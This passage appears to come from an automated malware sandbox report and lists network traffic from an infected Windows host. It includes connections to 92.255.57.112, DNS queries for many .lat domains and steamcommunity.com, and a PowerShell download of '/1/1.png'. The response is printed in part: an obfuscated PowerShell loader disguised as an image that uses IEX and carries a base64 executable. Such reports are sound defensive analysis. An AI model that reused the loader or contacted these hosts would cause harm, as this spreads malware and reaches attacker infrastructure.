                                                                                                                                                        Jan 15, 2025 10:18:40.064661980 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.064771891 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.064800978 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.064917088 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.064956903 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.064986944 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065099955 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065145969 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.065260887 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065336943 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065454960 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065481901 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.065598965 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065634966 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.065684080 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065800905 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065918922 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.065994978 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.066036940 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066142082 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.066153049 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066308975 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066313982 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.066467047 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066545010 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066654921 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.066660881 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066817045 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066824913 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.066864014 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066972017 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.066997051 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.067110062 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067205906 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067334890 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.067362070 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067504883 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.067508936 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067605972 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067698002 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067783117 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.067846060 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.068015099 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.533811092 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:40.663832903 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:41.663908005 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.663937092 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.664182901 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.666512966 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.666532993 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.877952099 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.878148079 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.880167007 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.880182981 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.880521059 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.919545889 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:41.962213039 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232274055 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232315063 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232435942 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232445002 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232510090 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.232531071 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232536077 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.232788086 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.232959986 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.334959984 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.335170031 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.335191965 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.335447073 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.335464001 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.335656881 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.339735031 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.339796066 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.340040922 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.340754986 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.340755939 CET49773443192.168.11.2023.47.27.74
                                                                                                                                                        Jan 15, 2025 10:18:42.340783119 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:42.340794086 CET4434977323.47.27.74192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:45.920447111 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.140657902 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:46.140850067 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.141911030 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.362298012 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:46.362524033 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.606004000 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:46.606021881 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:46.606304884 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.610614061 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:46.835545063 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:46.884860039 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:48.434303045 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:48.707058907 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:48.707245111 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:48.972585917 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:11.911561012 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:12.177746058 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:12.177978039 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:12.399599075 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:12.442073107 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:12.662477016 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:12.667254925 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:12.927450895 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:12.927673101 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:13.193015099 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:21.364667892 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:21.408873081 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:21.629173040 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:21.674205065 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:36.921205997 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:37.188024998 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:37.188273907 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:37.409396887 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:37.451951027 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:37.671936035 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:37.673108101 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:37.938066959 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:37.938788891 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:38.203334093 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:56.373193026 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:56.416771889 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:19:56.637195110 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:19:56.682276011 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:01.925815105 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:02.191167116 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:02.191380024 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:02.412560940 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:02.462084055 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:02.682322025 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:02.683372974 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:02.956640959 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:02.956912041 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:03.222174883 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:26.937597036 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:27.202867031 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:27.203142881 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:27.423934937 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:27.472209930 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:27.692327976 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:27.694003105 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:27.968674898 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:27.968904018 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:28.233902931 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:31.373975039 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:31.424470901 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:31.644418001 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:31.690036058 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:44.315712929 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:44.582079887 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:44.582212925 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:44.803206921 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:44.843487978 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:45.063782930 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:45.064588070 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:45.335680962 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:20:45.335911989 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:20:45.601248980 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:06.385688066 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:06.432471991 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:06.652693987 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:06.698012114 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:09.338396072 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:09.611700058 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:09.611896992 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:09.833116055 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:09.884821892 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:10.105269909 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:10.105950117 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:10.377393961 CET560014977492.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:21:10.377598047 CET4977456001192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:21:10.642704964 CET560014977492.255.57.112192.168.11.20

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 15, 2025 10:18:35.878916025 CET5559853192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:36.054651022 CET53555981.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.609977007 CET6423653192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:40.712085009 CET53642361.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.713937998 CET5014753192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:40.819818974 CET53501471.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.821662903 CET4921953192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:40.925918102 CET53492191.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:40.927416086 CET5379953192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.033083916 CET53537991.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.034271002 CET6275753192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.139131069 CET53627571.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.140322924 CET5084153192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.242805004 CET53508411.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.243845940 CET5905053192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.347691059 CET53590501.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.349145889 CET6361653192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.452049971 CET53636161.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.453264952 CET5050553192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.558430910 CET53505051.1.1.1192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:41.559501886 CET4921253192.168.11.201.1.1.1
                                                                                                                                                        Jan 15, 2025 10:18:41.660060883 CET53492121.1.1.1192.168.11.20

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Jan 15, 2025 10:18:35.878916025 CET192.168.11.201.1.1.10xea04Standard query (0)view-reserve.comA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.609977007 CET192.168.11.201.1.1.10xf3d0Standard query (0)curtainykeo.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.713937998 CET192.168.11.201.1.1.10x2fadStandard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.821662903 CET192.168.11.201.1.1.10xf9efStandard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.927416086 CET192.168.11.201.1.1.10x956dStandard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.034271002 CET192.168.11.201.1.1.10x8fa9Standard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.140322924 CET192.168.11.201.1.1.10xc990Standard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.243845940 CET192.168.11.201.1.1.10xcefbStandard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.349145889 CET192.168.11.201.1.1.10xea8dStandard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.453264952 CET192.168.11.201.1.1.10x63c8Standard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.559501886 CET192.168.11.201.1.1.10xc694Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Jan 15, 2025 10:18:36.054651022 CET1.1.1.1192.168.11.200xea04No error (0)view-reserve.com92.255.57.120A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.712085009 CET1.1.1.1192.168.11.200xf3d0Name error (3)curtainykeo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.819818974 CET1.1.1.1192.168.11.200x2fadName error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:40.925918102 CET1.1.1.1192.168.11.200xf9efName error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.033083916 CET1.1.1.1192.168.11.200x956dName error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.139131069 CET1.1.1.1192.168.11.200x8fa9Name error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.242805004 CET1.1.1.1192.168.11.200xc990Name error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.347691059 CET1.1.1.1192.168.11.200xcefbName error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.452049971 CET1.1.1.1192.168.11.200xea8dName error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.558430910 CET1.1.1.1192.168.11.200x63c8Name error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 15, 2025 10:18:41.660060883 CET1.1.1.1192.168.11.200xc694No error (0)steamcommunity.com23.47.27.74A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • view-reserve.com
                                                                                                                                                        • steamcommunity.com
                                                                                                                                                        • 92.255.57.112

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.11.204977092.255.57.112808332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 15, 2025 10:18:38.535353899 CET70OUTGET /1/1.png HTTP/1.1
                                                                                                                                                        Host: 92.255.57.112
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 15, 2025 10:18:38.760771036 CET1289INHTTP/1.1 200 OK
                                                                                                                                                        Content-Type: image/png
                                                                                                                                                        Last-Modified: Tue, 14 Jan 2025 20:24:05 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        ETag: "c7d94542c266db1:0"
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        Date: Wed, 15 Jan 2025 09:18:38 GMT
                                                                                                                                                        Content-Length: 122758
                                                                                                                                                        Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACsKKGw [TRUNCATED]
                                                                                                                                                        Jan 15, 2025 10:18:38.760791063 CET1289INData Raw: 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 42 33 63 6b 65 42 68 4a 52 4d 47 47 31 35 46 42 51 41 41 41 4e 66 2f 2f 2f 38 46 41 41 41 41 6f 41 41 41 41 46 55 41 41 41 43 44 41 41 41 41 4f 4a 73 41 41 41
                                                                                                                                                        Data Ascii: 2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhxT+BgMAAAZzdgAACij+AAAGDQkXKM0CAAYJfgwBAAQocgEABiAJzKC
                                                                                                                                                        Jan 15, 2025 10:18:38.760967970 CET1289INData Raw: 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 67 36 41 67 41 47 4b 67 41 54 4d 41 67 41 64 67 45 41 41 41 51 41 41 42 45 43 4b 4d 67 42 41 41 59 4b 63 79 38 41 41 41 59 4c 49 47 39 76 53 34 6f 67 4a 45 79 73 67 57 45 6c 45 77 6b 66 44 46 35
                                                                                                                                                        Data Ascii: zAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAAUAAABIAAAAqQAAADgPAQAAEQQeMggg630YwiUrBiDox/uxJSYrpBYTBBEJINd7ZdFaIHIBx1phK5EbKLwBAAYMEQkgdwR4Dlog9klhNmE4
